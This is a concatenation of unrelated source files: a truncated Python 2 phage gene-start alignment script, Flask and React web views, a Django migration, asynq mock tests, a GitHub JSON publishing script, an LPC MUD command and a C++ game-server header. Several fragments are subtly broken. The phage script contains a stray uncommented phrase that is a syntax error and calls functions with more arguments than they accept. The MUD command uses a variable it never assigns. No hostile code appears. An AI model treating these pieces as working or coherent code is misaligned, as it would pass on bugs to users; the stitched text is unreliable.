return tooLongBackwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons)
else:
if gene['start'] < gene['end']:
print "Forward"
return tooLongForwardRevComp(db, gene, ideal_move_distance, revcomp_start_codons, revcomp_stop_codons)
elif gene['start'] > gene['end']:
print "Backward"
return tooLongBackwardRevComp(db, gene, ideal_move_distance, revcomp_start_codons, revcomp_stop_codons)
def tooShortForwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['start'] - (3 * i) # decrease our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3]
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooShortBackwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['start'] + (3 * i) # increase our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3]
codon = codon[::-1] # reverse the codon
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooShortForwardRevComp(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['end'] - (3 * i) - 2 # decrease our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3]
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooShortBackwardRevComp(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['end'] + (3 * i) - 2 # increase our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3]
codon = codon[::-1] # reverse the codon
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooShort(db, gene, ideal_move_distance, start_codons, stop_codons):
if gene['rev_comp'] == False:
if gene['start'] < gene['end']:
print "Forward"
return tooShortForwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons)
elif gene['start'] > gene['end']:
print "Backward"
return tooShortBackwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons)
else:
if gene['start'] < gene['end']:
print "Forward"
return tooShortForwardRevComp(db, gene, ideal_move_distance, revcomp_start_codons, revcomp_stop_codons)
elif gene['start'] > gene['end']:
print "Backward"
return tooShortBackwardRevComp(db, gene, ideal_move_distance, revcomp_start_codons, revcomp_stop_codons)
# makes the best possible adjustments for a given cluster, aligning any genes that do not belong to
def adjust_cluster(db,cluster,golden_phage_id,start_codons,stop_codons):
#first we need to make a list of all the golden phage proteins that are in this create_cluster
golden_phages = get_golden_phages(db)
golden_genes = get_golden_genes(golden_phages, cluster)
print golden_genes.values()
print golden_phages
#print golden_genes
if len(golden_genes) == 0: #make sure there is at least one gene from the golden phage in the cluster
return
for gene in cluster:
if gene['phage_id'] not in golden_phages:
potentialStarts = set() # Because if we have muliple golds we will have many different starts to try?
print
print "New Gene"
possible_adjustments = []
for index, gold_ids in enumerate(golden_genes.values()):
print index, gold_ids
for gold_id in gold_ids:
blastp_hit = None
for hit in gene['hits']: #find hit in gene for that gold_id
if hit['subject_id'] == gold_id:
blastp_hit = hit
break
if blastp_hit is not None: # if we found a hit for that gene, continue
#print "Gene", gene['id'], "and gene", gold_id, "has hit", blastp_hit
golden_start = blastp_hit['subject_start']
gene_start = blastp_hit['query_start']
# our gene is too short and we need to move the start upstream
if gene_start == 1 and golden_start == 1:
print "They are already perfectly aligned!"
elif gene_start == 1:
print "Too Short"
ideal_move_distance = golden_start - gene_start
newCloseStart, newFarStart = tooShort(db, gene, ideal_move_distance, start_codons, stop_codons,revcomp_start_codons,revcomp_stop_codons)
if newCloseStart != None:
potentialStarts.add(newCloseStart)
if newFarStart != None:
potentialStarts.add(newFarStart)
# our gene is too long and we need to trim it down
elif golden_start == 1:
print "Too Long"
ideal_move_distance = gene_start - golden_start
newCloseStart, newFarStart = tooLong(db, gene, ideal_move_distance, start_codons, stop_codons,revcomp_start_codons,revcomp_stop_codons)
######## Just to debug #####################
print "Starts:", newCloseStart, newFarStart
print "Original:", gene['start']
###################################
if newCloseStart != None:
potentialStarts.add(newCloseStart)
if newFarStart != None:
potentialStarts.add(newFarStart)
# right now we do nothing...
else:
print "Neither one starts at 1..."
else:
print "Gene", gene['id'], "has no blastp hit for golden gene", gold_id, gene['hits']
if potentialStarts: # if set is not empty
bestStart = findBestStart(db, gene, potentialStarts, ideal_move_distance)
updateStart(db, gene['id'], bestStart, gene['rev_comp']) Uncomment when ready
###############################################################################################################
parser = argparse.ArgumentParser()
parser.add_argument("--clustalo_cutoff", help="Minimum percent identity when clustering", default=32.5)
parser.add_argument("--blastp_cutoff", help="Minimum e-value when clustering", default=1e-35)
args = parser.parse_args()
# Hard coded for dev
start_codons = ['ATG','GTG','TTG'] #CCG
revcomp_start_codons = ['CAT', 'CAC', 'CAA']
stop_codons = ['TAG', 'TAA', 'TGA']
revcomp_stop_codons = ['CTA', 'TTA', 'TCA']
cluster_id = 17
db = connect_db("geneysis.db")
cluster = get_cluster(db, cluster_id, args)
golden_phage_id = 5
adjust_cluster(db,cluster,golden_phage_id,start_codons,stop_codons,revcomp_start_codons,revcomp_stop_codons)
|
const getChaincodeConfig = require('./getChaincodeConfig');
const CONSTANTS = require('./../constants/index');
module.exports = function getChaincodeChannel(chaincodeLocation) {
const config = getChaincodeConfig(chaincodeLocation);
if (config != null) {
return config['hf-dev-channel'] || CONSTANTS.DEFAULT_CHANNEL;
}
return CONSTANTS.DEFAULT_CHANNEL;
};
|
from flask import render_template, request, redirect, url_for
from . import main
# from app import main
from ..request import get_movies, get_movie, search_movie
from .forms import ReviewForm
from ..models import Review
# Views
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
# Getting popular movie
popular_movies = get_movies('popular')
upcoming_movie = get_movies('upcoming')
now_showing_movie = get_movies('now_playing')
title = 'The movie review website'
search_movie = request.args.get('movie_query')
if search_movie:
return redirect(url_for('.search', movie_name=search_movie))
else:
return render_template('index.html', title=title, popular=popular_movies, upcoming=upcoming_movie, now_showing=now_showing_movie)
@main.route('/movie/<int:id>')
def movie(id):
'''
View movie page function that returns the movie details page and its data
'''
movie = get_movie(id)
title = f'{movie.title}'
reviews = Review.get_reviews(movie.id)
return render_template('movie.html', title=title, movie=movie, reviews=reviews)
@main.route('/search/<movie_name>')
def search(movie_name):
'''
View function to display the search results
'''
movie_name_list = movie_name.split(" ")
movie_name_format = "+".join(movie_name_list)
searched_movies = search_movie(movie_name_format)
title = f'Search results for "{movie_name}"'
return render_template('search.html', movies=searched_movies)
@main.route('/movie/review/new/<int:id>', methods=['GET', 'POST'])
def new_review(id):
form = ReviewForm()
movie = get_movie(id)
if form.validate_on_submit():
title = form.title.data
review = form.review.data
new_review = Review(movie.id, title, movie.poster, review)
new_review.save_review()
return redirect(url_for('.movie', id=movie.id))
title = f'{movie.title} review'
return render_template('new_review.html', title=title, review_form=form, movie=movie)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crm', '0004_auto_20160202_1146'),
('heritage', '0031_interview_other_interviewers'),
]
operations = [
migrations.AddField(
model_name='interview',
name='attendees',
field=models.ManyToManyField(to='crm.Person', related_name='interviews_attended'),
),
]
|
# Copyright 2016 Quora, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asynq
from qcore.asserts import assert_eq, assert_is, assert_not_in, AssertRaises
# ===================================================
# Objects to mock
# ===================================================
@asynq.asynq()
def fn():
pass
@asynq.asynq()
def async_caller():
ret = yield fn.asynq()
return (ret, fn())
def non_async_caller():
return fn()
class Cls(object):
@asynq.asynq()
@classmethod
def async_classmethod(cls):
pass
def non_async_method(self, foo):
pass
@asynq.asynq()
def async_method(self):
return "capybaras"
instance = Cls()
@asynq.asynq()
def class_method_async_caller():
ret = yield Cls.async_classmethod.asynq()
return (ret, Cls.async_classmethod())
def class_method_non_async_caller():
return Cls.async_classmethod()
@asynq.asynq()
def method_async_caller():
obj = Cls()
ret = yield obj.async_method.asynq()
return (ret, obj.async_method())
def method_non_async_caller():
return Cls().async_method()
class Counter(object):
linked_class = Cls
def __init__(self):
self.count = 0
def add_call(self):
self.count += 1
class SecondClass(object):
pass
IMPORTANT_DICTIONARY = {"capybaras": "guinea pigs", "hutias": "coypus"}
# ===================================================
# Helpers for testing that mocks work right.
# ===================================================
class MockChecker(object):
@classmethod
def check(cls, mock_fn, mock_classmethod, mock_method):
cls._check_mock(mock_fn, async_caller, non_async_caller)
cls._check_mock(
mock_classmethod, class_method_async_caller, class_method_non_async_caller
)
cls._check_mock(mock_method, method_async_caller, method_non_async_caller)
@classmethod
def _check_mock(cls, mock_fn, async_caller, non_async_caller):
raise NotImplementedError
class MockCheckerWithAssignment(MockChecker):
@classmethod
def _check_mock(cls, mock_fn, async_caller, non_async_caller):
mock_fn.return_value = 42
assert_eq(0, mock_fn.call_count)
assert_eq(42, non_async_caller())
assert_eq(1, mock_fn.call_count)
assert_eq((42, 42), async_caller())
assert_eq(3, mock_fn.call_count)
mock_fn.side_effect = lambda: 43
assert_eq(43, non_async_caller())
assert_eq((43, 43), async_caller())
class MockCheckerWithNew(MockChecker):
@classmethod
def _check_mock(cls, mock_fn, async_caller, non_async_caller):
assert_eq(42, non_async_caller())
assert_eq((42, 42), async_caller())
# ===================================================
# Actual tests.
# ===================================================
def test_mock_async_context():
with asynq.mock.patch(
"asynq.tests.test_mock.fn"
) as mock_fn, asynq.mock.patch.object(
Cls, "async_classmethod"
) as mock_classmethod, asynq.mock.patch.object(
Cls, "async_method"
) as mock_method:
MockCheckerWithAssignment.check(mock_fn, mock_classmethod, mock_method)
with asynq.mock.patch(
"asynq.tests.test_mock.fn", lambda: 42
) as mock_fn, asynq.mock.patch.object(
Cls, "async_classmethod", classmethod(lambda _: 42)
) as mock_classmethod, asynq.mock.patch.object(
Cls, "async_method", lambda _: 42
) as mock_method:
MockCheckerWithNew.check(mock_fn, mock_classmethod, mock_method)
@asynq.mock.patch("asynq.tests.test_mock.fn")
@asynq.mock.patch.object(Cls, "async_classmethod")
@asynq.mock.patch("asynq.tests.test_mock.Cls.async_method")
def test_mock_async_decorator(mock_method, mock_classmethod, mock_fn):
MockCheckerWithAssignment.check(mock_fn, mock_classmethod, mock_method)
@asynq.mock.patch("asynq.tests.test_mock.fn")
@asynq.mock.patch.object(Cls, "async_classmethod")
@asynq.mock.patch("asynq.tests.test_mock.Cls.async_method")
class TestMockAsyncClassDecorator(object):
def test(self, mock_method, mock_classmethod, mock_fn):
MockCheckerWithAssignment.check(mock_fn, mock_classmethod, mock_method)
@asynq.mock.patch("asynq.tests.test_mock.fn", lambda: 42)
@asynq.mock.patch.object(Cls, "async_classmethod", classmethod(lambda _: 42))
@asynq.mock.patch("asynq.tests.test_mock.Cls.async_method", lambda _: 42)
def test_mock_async_decorator_with_new():
MockCheckerWithNew.check(fn, Cls.async_classmethod, Cls().async_method)
@asynq.mock.patch("asynq.tests.test_mock.fn", lambda: 42)
@asynq.mock.patch.object(Cls, "async_classmethod", classmethod(lambda _: 42))
@asynq.mock.patch("asynq.tests.test_mock.Cls.async_method", lambda _: 42)
class TestMockAsyncClassDecoratorWithNew(object):
def test(self):
MockCheckerWithNew.check(fn, Cls.async_classmethod, Cls().async_method)
def test_mock_async_dict():
assert_eq("guinea pigs", IMPORTANT_DICTIONARY["capybaras"])
with asynq.mock.patch.dict(
"asynq.tests.test_mock.IMPORTANT_DICTIONARY", {"capybaras": "maras"}
):
assert_eq("maras", IMPORTANT_DICTIONARY["capybaras"])
assert_eq("coypus", IMPORTANT_DICTIONARY["hutias"])
assert_eq("guinea pigs", IMPORTANT_DICTIONARY["capybaras"])
with asynq.mock.patch.dict(
"asynq.tests.test_mock.IMPORTANT_DICTIONARY", {"capybaras": "maras"}, clear=True
):
assert_eq("maras", IMPORTANT_DICTIONARY["capybaras"])
assert_not_in("hutias", IMPORTANT_DICTIONARY)
def test_maybe_wrap_new():
counter = Counter()
with asynq.mock.patch("asynq.tests.test_mock.fn", counter.add_call):
fn()
assert_eq(1, counter.count)
with asynq.mock.patch("asynq.tests.test_mock.fn", "capybara"):
assert_eq("capybara", fn)
def test_start_stop():
original_fn = fn
new_fn = asynq.asynq()(lambda: 42)
patch = asynq.mock.patch("asynq.tests.test_mock.fn", new_fn)
assert_is(original_fn, asynq.tests.test_mock.fn)
patch.start()
assert_is(new_fn, asynq.tests.test_mock.fn)
patch.stop()
assert_is(original_fn, asynq.tests.test_mock.fn)
class TestPatchMethodWithMethod(object):
def setup(self):
self.calls = []
def mock_method(self, foo):
self.calls.append(foo)
def test(self):
with asynq.mock.patch.object(instance, "non_async_method", self.mock_method):
assert_eq([], self.calls)
instance.non_async_method("bar")
assert_eq(["bar"], self.calls)
def test_patch_class():
with asynq.mock.patch.object(Counter, "linked_class", SecondClass):
assert_is(SecondClass, Counter.linked_class)
def test_cant_set_attribute():
with asynq.mock.patch("asynq.tests.test_mock.fn"):
with AssertRaises(TypeError):
fn.asynq.cant_set_attribute = "capybara"
|
"""Create json with information for custom_updater."""
import json
import random
from github import Github
from github.GithubException import UnknownObjectException
from customjson.defaults import COMMIT
class CreateJson:
"""Class for json creation."""
def __init__(self, token, push, repo=None):
"""Initilalize."""
self.token = token
self.repo = repo
self.selected = repo
self.push = push
self.github = Github(token)
def component(self):
"""Generate json for components."""
from customjson.components.org import get_data as org
from customjson.components.isabellaalstrom import get_isabellaalstrom
from customjson.components.custom_updater import get_data as custom_updater
organisation = "custom-components"
data = {}
components = org(self.github, self.repo)
for component in components:
data[component] = components[component]
components = get_isabellaalstrom(self.github, self.repo)
for component in components:
data[component] = components[component]
components = custom_updater()
for component in components:
data[component] = components[component]
components = data
legacy = {}
data = {}
for component in components:
changelog = components[component].get("changelog", "")
local_location = components[component].get("local_location", "")
remote_location = components[component].get("remote_location", "")
updated_at = components[component].get("updated_at", "")
version = components[component].get("version", "")
visit_repo = components[component].get("visit_repo", "")
author = components[component].get("author", "")
resources = components[component].get("resources", [])
description = components[component].get("description", "")
image_link = components[component].get("image_link", "")
embedded = components[component].get("embedded", "")
embedded_path = components[component].get("embedded_path", "")
embedded_path_remote = components[component].get("embedded_path_remote", "")
legacy[component] = {}
legacy[component]["changelog"] = changelog
legacy[component]["local_location"] = embedded_path
if embedded:
legacy[component]["remote_location"] = embedded_path_remote
else:
legacy[component]["remote_location"] = remote_location
legacy[component]["updated_at"] = updated_at
legacy[component]["version"] = version
legacy[component]["visit_repo"] = visit_repo
legacy[component]["resources"] = resources
data[component] = {}
data[component]["author"] = author
data[component]["version"] = version
data[component]["description"] = description
data[component]["image_link"] = image_link
data[component]["local_location"] = local_location
data[component]["remote_location"] = remote_location
data[component]["visit_repo"] = visit_repo
data[component]["changelog"] = changelog
data[component]["resources"] = resources
data[component]["embedded"] = embedded
data[component]["embedded_path"] = embedded_path
data[component]["embedded_path_remote"] = embedded_path_remote
if self.push:
target = "repos.json"
repo = self.github.get_repo(organisation + "/information")
repos_json = repo.get_contents(target)
old = json.loads(repos_json.decoded_content.decode())
sha = repos_json.sha
msg = random.choice(COMMIT)
raw = legacy
legacy = json.dumps(legacy, indent=4, sort_keys=True)
if not legacy:
print("no data")
return
try:
if has_changed(old, raw):
print(repo.update_file(target, msg, legacy, sha))
else:
print("content did not change")
except UnknownObjectException:
message = "You do not have premissions to push to {}/{}"
print(message.format(organisation + "/information"))
except Exception as error: # pylint: disable=W0703
print("Something went horrible wrong :(")
print(error)
target = "custom-component-store/V1/data.json"
repo = self.github.get_repo("ludeeus/data")
repos_json = repo.get_contents(target)
old = json.loads(repos_json.decoded_content.decode())
sha = repos_json.sha
msg = random.choice(COMMIT)
raw = data
data = json.dumps(data, indent=4, sort_keys=True)
if not data:
print("no data")
return
try:
if has_changed(old, raw):
print(repo.update_file(target, msg, data, sha))
else:
print("content did not change")
except UnknownObjectException:
message = "You do not have premissions to push to ludeeus/data"
print(message)
except Exception as error: # pylint: disable=W0703
print("Something went horrible wrong :(")
print(error)
else:
print(json.dumps(legacy, indent=4, sort_keys=True))
print(json.dumps(data, indent=4, sort_keys=True))
def card(self):
"""Generate json for cards."""
from customjson.cards.org import get_data as org
from customjson.cards.ciotlosm import get_data as ciotlosm
from customjson.cards.isabellaalstrom import get_isabellaalstrom
from customjson.cards.maykar import get_data as maykar
from customjson.cards.thomasloven import get_data as thomasloven
organisation = "custom-cards"
data = {}
cards = org(self.github, self.repo)
for card in cards:
data[card] = cards[card]
cards = ciotlosm(self.github, self.repo)
for card in cards:
data[card] = cards[card]
cards = get_isabellaalstrom(self.github, self.repo)
for card in cards:
data[card] = cards[card]
cards = maykar(self.github, self.repo)
for card in cards:
data[card] = cards[card]
cards = thomasloven(self.github, self.repo)
for card in cards:
data[card] = cards[card]
if self.push:
target = "repos.json"
repo = self.github.get_repo(organisation + "/information")
repos_json = repo.get_contents(target)
sha = repos_json.sha
msg = random.choice(COMMIT)
if self.selected:
old = json.loads(repos_json.decoded_content.decode())
new = data
data = {}
for item in old:
data[item] = old[item]
for item in new:
data[item] = new[item]
print(json.dumps(new, indent=4, sort_keys=True))
raw = data
data = json.dumps(data, indent=4, sort_keys=True)
if not data:
print("no data")
return
try:
old = json.loads(repos_json.decoded_content.decode())
if has_changed(old, raw):
print(repo.update_file(target, msg, data, sha))
else:
print("content did not change")
except UnknownObjectException:
message = "You do not have premissions to push to {}/{}"
print(message.format(organisation + "/information"))
except Exception as error: # pylint: disable=W0703
print("Something went horrible wrong :(")
print(error)
else:
print(json.dumps(data, indent=4, sort_keys=True))
def has_changed(old, new):
"""Return bool if content has changed."""
import dictdiffer
return bool(list(dictdiffer.diff(old, new)))
|
import React, { Component } from "react";
import { connect } from "react-redux";
import { Link } from "react-router-dom";
import PropTypes from "prop-types";
import PostItem from "../posts/PostItem";
import CommentForm from "./CommentForm";
import CommentFeed from "./CommentFeed";
import Spinner from "../common/Spinner";
import { getPost } from "../../actions/postActions";
class Post extends Component {
componentDidMount() {
this.props.getPost(this.props.match.params.id);
}
render() {
const { post, loading } = this.props.post;
let postContent;
if (post === null || loading || Object.keys(post).length === 0) {
postContent = <Spinner />;
} else {
postContent = (
<div>
<PostItem post={post} showActions={false} />
<CommentForm postId={post._id} />
<CommentFeed postId={post._id} comments={post.comments} />
</div>
);
}
return (
<div className="post">
<div className="container">
<div className="row">
<div className="col-md-12">
<Link to="/feed" className="btn btn-light mb-3">
Back To Feed
</Link>
{postContent}
</div>
</div>
</div>
</div>
);
}
}
Post.propTypes = {
getPost: PropTypes.func.isRequired,
post: PropTypes.object.isRequired
};
const mapStateToProps = state => ({
post: state.post
});
export default connect(
mapStateToProps,
{ getPost }
)(Post);
|
int main( string param ) {
int x, y;
string desc;
object area;
WIZ_CHECK
if( !param ) {
notify_fail( "==> [Format] rmlandmark description" );
return 0;
}
area = environment(this_player());
if( !area ) return 0;
if( !area->query_is_landmark() )
area = environment(area);
if( !area->query_is_landmark() ) {
notify_fail("You don't seem to be somewhere that allows adding landmarks.\n");
return 0;
}
if( !area->query_landmark(desc) ) {
notify_fail("No such landmark.\n");
return 0;
}
area->remove_landmark( desc );
msg("Removing landmark '"+desc+"'");
return 1;
} |
import React, { PureComponent, Fragment } from 'react';
import { connect } from 'dva';
import { routerRedux } from 'dva/router';
import moment from 'moment';
import {
Row,
Col,
Card,
Form,
Input,
Button,
InputNumber,
DatePicker,
Modal,
message,
Divider,
} from 'antd';
import StandardTable from 'components/StandardTable';
import DictSelect from 'components/DictSelect';
import PageHeaderLayout from '../../layouts/PageHeaderLayout';
const RangePicker = DatePicker.RangePicker;
import styles from '../List/TableList.less';
const FormItem = Form.Item;
const getValue = obj =>
Object.keys(obj)
.map(key => obj[key])
.join(',');
@connect(({ ogpPatrolPlan, dictionary, loading }) => ({
ogpPatrolPlan,
dictionary,
loading: loading.models.ogpPatrolPlan,
}))
@Form.create()
export default class OgpPatrolPlanList extends PureComponent {
state = {
selectedRows: [],
formValues: {},
};
componentDidMount() {
const { dispatch } = this.props;
dispatch({
type: 'ogpPatrolPlan/fetch',
});
}
handleStandardTableChange = (pagination, filtersArg, sorter) => {
const { dispatch } = this.props;
const { formValues } = this.state;
const filters = Object.keys(filtersArg).reduce((obj, key) => {
const newObj = { ...obj };
newObj[key] = getValue(filtersArg[key]);
return newObj;
}, {});
const params = {
page: pagination.current - 1,
size: pagination.pageSize,
...formValues,
...filters,
};
if (sorter.field) {
params.sorter = `${sorter.field}_${sorter.order}`;
}
dispatch({
type: 'ogpPatrolPlan/fetch',
payload: params,
});
};
handleFormReset = () => {
const { form, dispatch } = this.props;
form.resetFields();
this.setState({
formValues: {},
});
dispatch({
type: 'ogpPatrolPlan/fetch',
payload: {},
});
};
handleRemove = () => {
const { dispatch } = this.props;
const { selectedRows } = this.state;
if (!selectedRows) return;
const onOkf = () => {
dispatch({
type: 'ogpPatrolPlan/remove',
payload: {
ids: selectedRows.map(row => row.planId).join(','),
},
callback: () => {
this.setState({
selectedRows: [],
});
message.info('已成功删除');
this.doSearch();
},
});
};
Modal.confirm({
title: '删除',
content: '确定永久删除选定的记录吗?',
okText: '确定删除',
okType: 'danger',
cancelText: '取消',
onOk: onOkf,
onCancel() {
// console.log('Cancel');
},
});
};
handleSelectRows = rows => {
this.setState({
selectedRows: rows,
});
};
doSearch = () => {
const { dispatch, form } = this.props;
form.validateFields((err, fieldsValue) => {
if (err) return;
const values = {
...fieldsValue,
le_createTime: fieldsValue.le_createTime && fieldsValue.le_createTime.format('YYYY-MM-DD HH:mm:ss'),
ge_createTime: fieldsValue.ge_createTime && fieldsValue.ge_createTime.format('YYYY-MM-DD HH:mm:ss'),
};
// console.log(values)
this.setState({
formValues: values,
});
dispatch({
type: 'ogpPatrolPlan/fetch',
payload: values,
});
});
};
handleSearch = e => {
e.preventDefault();
this.doSearch();
};
handleShow = (e, key) => {
const { dispatch } = this.props;
dispatch(routerRedux.push(`/opm/ogpPatrolPlan-profile/${key}`));
};
handleAdd = () => {
const { dispatch } = this.props;
dispatch(routerRedux.push(`/opm/ogpPatrolPlan-form/add/0`));
};
handleEdit = (e, key) => {
const { dispatch } = this.props;
dispatch(routerRedux.push(`/opm/ogpPatrolPlan-form/edit/${key}`));
};
renderAdvancedForm() {
const { dictionary, form } = this.props;
const { getFieldDecorator } = form;
return (
<Form onSubmit={this.handleSearch} layout="inline">
<Row gutter={{ md: 8, lg: 24, xl: 48 }}>
<Col md={6} sm={24}>
<FormItem label="计划名称">
{getFieldDecorator('like_planName')(<Input placeholder="请输入计划名称" />)}
</FormItem>
</Col>
<Col md={6} sm={24}>
<FormItem label="创建人员">
{getFieldDecorator('like_createPerson')(<Input placeholder="请输入创建人员" />)}
</FormItem>
</Col>
<Col md={7} sm={24}>
<FormItem label="创建时间">
{getFieldDecorator('le_createTime')(
<RangePicker placeholder={['开始日期', '结束日期']} />
)}
</FormItem>
</Col>
<div style={{ overflow: 'hidden' }}>
<Button icon="search" type="primary" htmlType="submit">
查询
</Button>
<Button icon="reload" style={{ marginLeft: 8 }} onClick={this.handleFormReset}>
重置
</Button>
</div>
</Row>
</Form>
);
}
renderForm() {
return this.renderAdvancedForm();
}
render() {
const { ogpPatrolPlan: { data, domain }, dictionary, loading } = this.props;
const { selectedRows } = this.state;
const columns = [
{
title: '计划编号',
dataIndex: 'planId',
},
{
title: '计划名称',
dataIndex: 'planName',
},
{
title: '创建人员',
dataIndex: 'createPerson',
},
{
title: '创建时间',
dataIndex: 'createTime',
},
{
title: '操作',
render: (text, record) => (
<Fragment>
<a onClick={e => this.handleEdit(e, record.planId)}>编辑</a>
<Divider type="vertical" />
<a onClick={e => this.handleShow(e, record.planId)}>查看</a>
</Fragment>
),
},
];
return (
<PageHeaderLayout>
<Card bordered={false}>
<div className={styles.tableList}>
<div className={styles.tableListForm}>{this.renderForm()}</div>
<div className={styles.tableListOperator}>
<Button type="dashed" style={{ width: '100%', marginBottom: 10 }} icon="plus" onClick={this.handleAdd}>
新建任务
</Button>
{selectedRows.length > 0 && (
<span>
<Button icon="minus" type="danger" style={{ marginBottom: 10, marginTop: 10 }} onClick={this.handleRemove}>
删除
</Button>
</span>
)}
</div>
<StandardTable
selectedRows={selectedRows}
loading={loading}
data={data}
columns={columns}
onSelectRow={this.handleSelectRows}
onChange={this.handleStandardTableChange}
rowKey="planId"
/>
</div>
</Card>
</PageHeaderLayout>
);
}
}
|
// Window.h
// Interfaces to the cWindow class representing a UI window for a specific block
#pragma once
#include "../FunctionRef.h"
#include "../ItemGrid.h"
class cPlayer;
class cWindowOwner;
class cClientHandle;
class cBrewingstandEntity;
class cChestEntity;
class cEnderChestEntity;
class cFurnaceEntity;
class cHopperEntity;
class cMinecartWithChest;
class cBeaconEntity;
class cSlotArea;
class cSlotAreaAnvil;
class cWorld;
typedef std::list<cPlayer *> cPlayerList;
typedef std::vector<cSlotArea *> cSlotAreas;
using cPlayerListCallback = cFunctionRef<bool(cPlayer &)>;
using cClientHandleCallback = cFunctionRef<bool(cClientHandle &)>;
// tolua_begin
/**
Represents a UI window.
Each window has a list of players that are currently using it
When there's no player using a window, it is destroyed.
A window consists of several areas of slots with similar functionality - for example the crafting grid area, or
the inventory area. Each area knows what its slots are (GetSlot() function) and can handle mouse clicks.
The window acts only as a top-level container for those areas, redirecting the click events to the correct areas.
Inventory painting, introduced in 1.5, is handled by the window, too
*/
class cWindow
{
public:
enum WindowType
{
wtInventory = -1, // This value is never actually sent to a client
wtChest = 0,
wtWorkbench = 1,
wtFurnace = 2,
wtDropSpenser = 3, // Dropper or Dispenser
wtEnchantment = 4,
wtBrewery = 5,
wtNPCTrade = 6,
wtBeacon = 7,
wtAnvil = 8,
wtHopper = 9,
wtDropper = 10,
wtAnimalChest = 11,
};
// tolua_end
static const int c_NumInventorySlots = 36;
cWindow(WindowType a_WindowType, const AString & a_WindowTitle);
virtual ~cWindow();
char GetWindowID(void) const { return m_WindowID; } // tolua_export
int GetWindowType(void) const { return m_WindowType; } // tolua_export
/** Returns the textual representation of the window's type, such as "minecraft:chest". */
const AString GetWindowTypeName(void) const; // tolua_export
cWindowOwner * GetOwner(void) { return m_Owner; }
void SetOwner( cWindowOwner * a_Owner) { m_Owner = a_Owner; }
/** Returns the total number of slots */
int GetNumSlots(void) const;
/** Returns the number of slots, excluding the player's inventory (used for network protocols) */
int GetNumNonInventorySlots(void) const { return GetNumSlots() - c_NumInventorySlots; }
// tolua_begin
/** Returns the item at the specified slot for the specified player. Returns nullptr if invalid SlotNum requested */
const cItem * GetSlot(cPlayer & a_Player, int a_SlotNum) const;
/** Sets the item to the specified slot for the specified player */
void SetSlot(cPlayer & a_Player, int a_SlotNum, const cItem & a_Item);
/** Returns true if the specified slot is in the Player Main Inventory slotarea */
bool IsSlotInPlayerMainInventory(int a_SlotNum) const;
/** Returns true if the specified slot is in the Player Hotbar slotarea */
bool IsSlotInPlayerHotbar(int a_SlotNum) const;
/** Returns true if the specified slot is in the Player Main Inventory or Hotbar slotareas. Note that returns false for Armor. */
bool IsSlotInPlayerInventory(int a_SlotNum) const;
// tolua_end
/** Fills a_Slots with the slots read from m_SlotAreas[], for the specified player */
void GetSlots(cPlayer & a_Player, cItems & a_Slots) const;
/** Handles a click event from a player */
virtual void Clicked(
cPlayer & a_Player, int a_WindowID,
short a_SlotNum, eClickAction a_ClickAction,
const cItem & a_ClickedItem
);
virtual void OpenedByPlayer(cPlayer & a_Player);
/** Called when a player closes this window; notifies all slot areas. Returns true if close accepted */
virtual bool ClosedByPlayer(cPlayer & a_Player, bool a_CanRefuse);
/** Sends the specified slot's contents to all clients of this window; the slot is specified as local in an area */
void BroadcastSlot(cSlotArea * a_Area, int a_LocalSlotNum);
/** Sends the contents of the whole window to the specified client */
void SendWholeWindow(cClientHandle & a_Client);
/** Sends the contents of the whole window to all clients of this window. */
void BroadcastWholeWindow(void);
// tolua_begin
